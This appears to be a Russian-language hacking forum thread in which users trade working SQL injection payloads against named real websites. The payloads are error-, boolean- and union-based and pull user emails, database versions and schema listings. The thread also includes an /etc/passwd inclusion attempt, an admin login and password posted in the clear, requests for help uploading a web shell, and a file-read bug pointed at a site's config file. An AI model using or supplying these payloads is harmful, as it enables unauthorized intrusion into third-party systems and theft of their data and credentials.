/ru/users/?brands%5B%5D=9+and%28select+1+from%28select+count %28*%29%2Cconcat%28%28select+%28select+%28select+c oncat%280x27%2C0x7e%2Cusers.email%2C0x27%2C0x7e%29 +from+%60dbname%60.users+Order+by+id+limit+4%2C1%2 9+%29+from+%60information_schema%60.tables+limit+0 %2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60inf ormation_schema%60.tables+group+by+x%29a%29+and+1% 3D1

выводит:


Code:
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row' in /

куда копать?

sysjuk said:
куда копать?


group_concat(users.email)


vikler said:
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?


error-based. однако, там тоже запрос режется, нужно узнать версию и выбрать самый короткий вектор

https://rdot.org/forum/showthread.php?t=325

например:

http://savepic.ru/6521887.png


Code:
XPATH syntax error: '.73-log5.1.73-log'

Так какой же вектор применим к этому случаю?


Code:
xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html

Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка?

http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'

не получается найти нужное направление, error based не помогает, что то можно придумать?


HTML:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1

не выдает ошибки

Br@!ns said:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'
не получается найти нужное направление, error based не помогает, что то можно придумать?

HTML:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1

не выдает ошибки


этож Magento, а какой скуле может быть речь?

MaxFast said:
Так какой же вектор применим к этому случаю?

Code:
xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html

Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка?




Code:
http://www.wyrgorod.ru/shop/subcategory_10000000%27+union+select+version%28%29--+_0.html

MaxFast said:
Так какой же вектор применим к этому случаю?

Code:
xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html

Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка?


Конечно это так. Я вообще хрен знает, что делаю на этом форуме. Сижу, фигнёй страдаю.

Boolean Based

http://www.wyrgorod.ru/shop/subcategory_10'and(substr(@@version,1,1))=5+--+_0.html TRUE

http://www.wyrgorod.ru/shop/subcategory_10'and(substr(@@version,1,1))=4+--+_0.html FALSE

Union Based

http://www.wyrgorod.ru/shop/subcategory_10'and(1)=2+union+select+@@version+--+_0.html

Хватит вариантов?

Всем привет! Не могу залить шелл на сайт, через форму заливки я загружаю шелл.. пишет "Файл успешно загружен" но шелла на сайте так и нет.


Code:
http://hts.kharkov.ua/admin/update_graph.php
Email: reddd14@mail.ru
Password: 55755575

Помимо этой админки есть ещё и другая


Code:
http://hts.kharkov.ua/admin.php

г-н winstrool сказал, что пароль может быть спрятан "в локальной читалке" но я уже все архивы по перекачивал, старицы по пересматривал и сканером ArxScanSite 3.0 прошёлся, но увы. Помогите с заливкой шелла!

Select schema_name from information_schema.schemata

для MsSQL выводит список всех dbs. Как дальше через infromation_schema вывести таблицы и колонки другой базы данных?

Select table_name from information_schema.tables where...

а как связать со schema_name?

vikler said:
Select schema_name from information_schema.schemata
для MsSQL выводит список всех dbs. Как дальше через infromation_schema вывести таблицы и колонки другой базы данных?
Select table_name from information_schema.tables where...
а как связать со schema_name?


select table_name from information_schema.tables where table_schema='information_schema' , где 'information_schema' - нужная бд. если фильтрует кавычки, то select table_name from information_schema.tables where table_schema=0x696E666F726D6174696F6E5F736368656D6 1

подскажите,есть ли тут инклюд? сколько не набираю ../ всё равно одно и тоже http://www.xn--brliner-kseblatt-vnbi.de/?site=regional&land=DE&bl=/etc/passwd

Br@!ns said:
select table_name from information_schema.tables where table_schema='information_schema' , где 'information_schema' - нужная бд. если фильтрует кавычки, то select table_name from information_schema.tables where table_schema=0x696E666F726D6174696F6E5F736368656D6 1


да-да, я так и делала,в идно нет прав на чтение других бд

Object reference not set to an instance of an object

Вот тебе БД.. выбирай любую. Но залить шелл не получится


Code:
http://www.hts.kharkov.ua/news_full.php?id=1%27+union+select+%28select%28@x% 29from%28select%28@x:=0x00%29,%28select%28null%29f rom%28information_schema.columns%29where%28table_s chema!=0x696e666f726d6174696f6e5f736368656d61%29an d%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name%29%29%29%29 x%29,2,3+--+

madam said:
подскажите,есть ли тут инклюд? сколько не набираю ../ всё равно одно и тоже http://www.xn--brliner-kseblatt-vnbi.de/?site=regional&land=DE&bl=/etc/passwd


нет. ошибка внутри. кстати, там есть несколько sqli

также, читалка файлов через fread():


Code:
http://www.bärliner-käseblatt.de/?site=startseite&lang=lol

конфиг /www/htdocs/w00b2ffe/anzeiger/config/config.php

faza02 said:
нет. ошибка внутри. кстати, там есть несколько sqli
также, читалка файлов через fread():

Code:
http://www.bärliner-käseblatt.de/?site=startseite&lang=lol

конфиг
/www/htdocs/w00b2ffe/anzeiger/config/config.php


спасибо,про sqli я видела,интересней было бы мини шелл получить))